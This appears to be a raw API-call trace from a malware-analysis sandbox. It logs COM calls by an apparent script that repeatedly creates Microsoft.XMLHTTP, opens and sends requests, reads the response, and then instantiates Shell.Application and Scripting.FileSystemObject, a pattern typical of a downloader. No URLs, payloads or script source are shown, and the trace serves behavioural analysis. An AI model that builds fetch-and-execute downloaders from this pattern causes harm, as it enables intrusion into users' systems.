	[0501.679] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0501.679] SysStringLen (param_1=0x0) returned 0x0
	[0501.679] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0501.679] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0501.679] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0501.679] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0501.679] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0501.680] ??2@YAPEAX_K@Z () returned 0x62f330
	[0501.680] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f330) 
	[0501.680] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0501.680] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0501.680] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0501.680] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0501.680] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0501.680] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0501.680] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0501.680] longjmp () 
	[0501.680] longjmp () 
	[0501.680] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0501.680] SysStringLen (param_1=0x0) returned 0x0
	[0501.680] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0501.680] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0501.681] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0501.681] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0501.681] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c68) returned 0x0
	[0501.681] ??2@YAPEAX_K@Z () returned 0x62f310
	[0501.681] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c68, pUnkSite=0x62f310) 
	[0501.681] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0501.681] XMLHTTPRequest:IUnknown:Release (This=0x49c5c68) returned 0x0
	[0501.681] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0501.681] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0501.681] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0501.681] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0501.681] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0501.681] longjmp () 
	[0501.681] longjmp () 
	[0501.682] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0501.682] SysStringLen (param_1=0x0) returned 0x0
	[0501.682] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0501.682] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0501.682] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0501.682] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0501.682] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0501.682] ??2@YAPEAX_K@Z () returned 0x62f330
	[0501.682] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f330) 
	[0501.682] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0501.682] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0501.682] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0501.682] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0501.682] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0501.682] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0501.682] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0501.683] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0501.683] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0501.683] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0502.199] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0502.199] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0502.199] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0502.199] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0502.199] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0502.199] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0502.199] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0502.200] SysStringLen (param_1=0x0) returned 0x0
	[0502.200] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0502.200] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0502.200] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0502.200] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0502.200] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0502.200] ??2@YAPEAX_K@Z () returned 0x62f350
	[0502.200] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0502.200] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0502.200] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0502.200] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0502.200] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0502.200] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0502.200] SysStringLen (param_1=0x0) returned 0x0
	[0502.200] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0502.203] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0502.203] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0502.203] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0502.203] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0502.203] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0502.203] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0503.619] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0503.619] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0503.619] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0503.621] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0503.621] SysStringLen (param_1=0x0) returned 0x0
	[0503.621] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0503.621] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0503.621] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0503.621] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0503.621] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0503.621] ??2@YAPEAX_K@Z () returned 0x62f330
	[0503.621] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0503.621] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0503.621] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0503.621] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0503.621] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0503.622] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0503.622] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
